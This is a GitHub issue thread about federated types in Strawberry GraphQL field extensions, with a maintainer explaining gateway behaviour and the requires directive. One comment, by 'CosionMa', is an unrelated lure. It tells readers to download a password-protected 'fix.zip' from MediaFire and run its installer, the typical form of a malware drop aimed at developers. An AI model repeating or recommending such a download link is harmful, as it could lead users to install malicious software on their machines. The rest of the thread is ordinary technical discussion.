### ISSUE TITLE
Federated types aren't federated in field extensions

### ISSUE THREAD

**Issue by parafoxia** [strawberry-graphql/strawberry#3605]
I'm submitting this as an "other issue" as I'm not sure this really classifies as a bug.

This issue is derived from a [question on the Discord server](https://discord.com/channels/689806334337482765/1275412426132815903/1275412426132815903).

Original text:

Say you have this type in some file:
```py
@strawberry.federation.type(keys=["id"])
class User:
    id: strawberry.ID
    name: str
    age: int

    @classmethod
    def resolve_reference(cls, id: strawberry.ID):
        return cls(id=id, name="Rick Astley", age=58)
```

Then this in another file:
```py
@strawberry.federation.type(keys=["id"])
class User:
    id: strawberry.ID
```

If I had an extension like this, which extends a query that returns the minimal `User`:
```py
class Ext(FieldExtension):
    def resolve(self, next_, source, info, **kwargs):
        result = next_(source, info, **kwargs)
        print(f"The name of the user is {result.name}!")
        return result
```

it would throw an error saying `AttributeError: 'User' object has no attribute 'name'`, indicating it's not been federated.

We're trying to create a cache that is able to reconstruct Strawberry types from cached information, and while this works for normal types, it doesn't work for Strawberry types. My questions are:

1. Is there a better way of doing this that doesn't require the federated type?
2. If not, how do I get the federated type to be returned from the `next_` callable?

## Upvote & Fund

- We're using [Polar.sh](https://polar.sh/strawberry-graphql) so you can upvote and help fund this issue.
- We receive the funding once the issue is completed & confirmed by you.
- Thank you in advance for helping prioritize & fund our backlog.

<a href="https://polar.sh/strawberry-graphql/strawberry/issues/3605">
<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://polar.sh/api/github/strawberry-graphql/strawberry/issues/3605/pledge.svg?darkmode=1">
  <img alt="Fund with Polar" src="https://polar.sh/api/github/strawberry-graphql/strawberry/issues/3605/pledge.svg">
</picture>
</a>

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by patrick91** [comment]
@parafoxia is this in another service, right?

```python
@strawberry.federation.type(keys=["id"])
class User:
    id: strawberry.ID
```

> it would throw an error saying AttributeError: 'User' object has no attribute 'name', indicating it's not been federated.

So, this is not the case here, the type should still be federated, the reason why you don't get name is because the gateway doesn't send that to you. If you need that field you can use `require`: https://www.apollographql.com/docs/federation/federated-schemas/federated-directives/#requires

this basically tells the gateway that every time you request a specific field, for example id you need the name field

You could probably add that to your extension 😊

**Comment by parafoxia** [comment]
Sorry for the late reply to this, someone found an alternative way of doing our caching system entirely to use `SchemaExtension` instead (we didn't use this before cos we thought we needed extra control but we worked out we probably don't).

For completeness though (and out of curiousity, if it ever comes up again), how would that be used in Strawberry? I can't any mention of it in the docs, but I might be missing something.

(This can also be closed at your discretion now -- it's a misunderstanding on my part rather than an actual problem 😄)
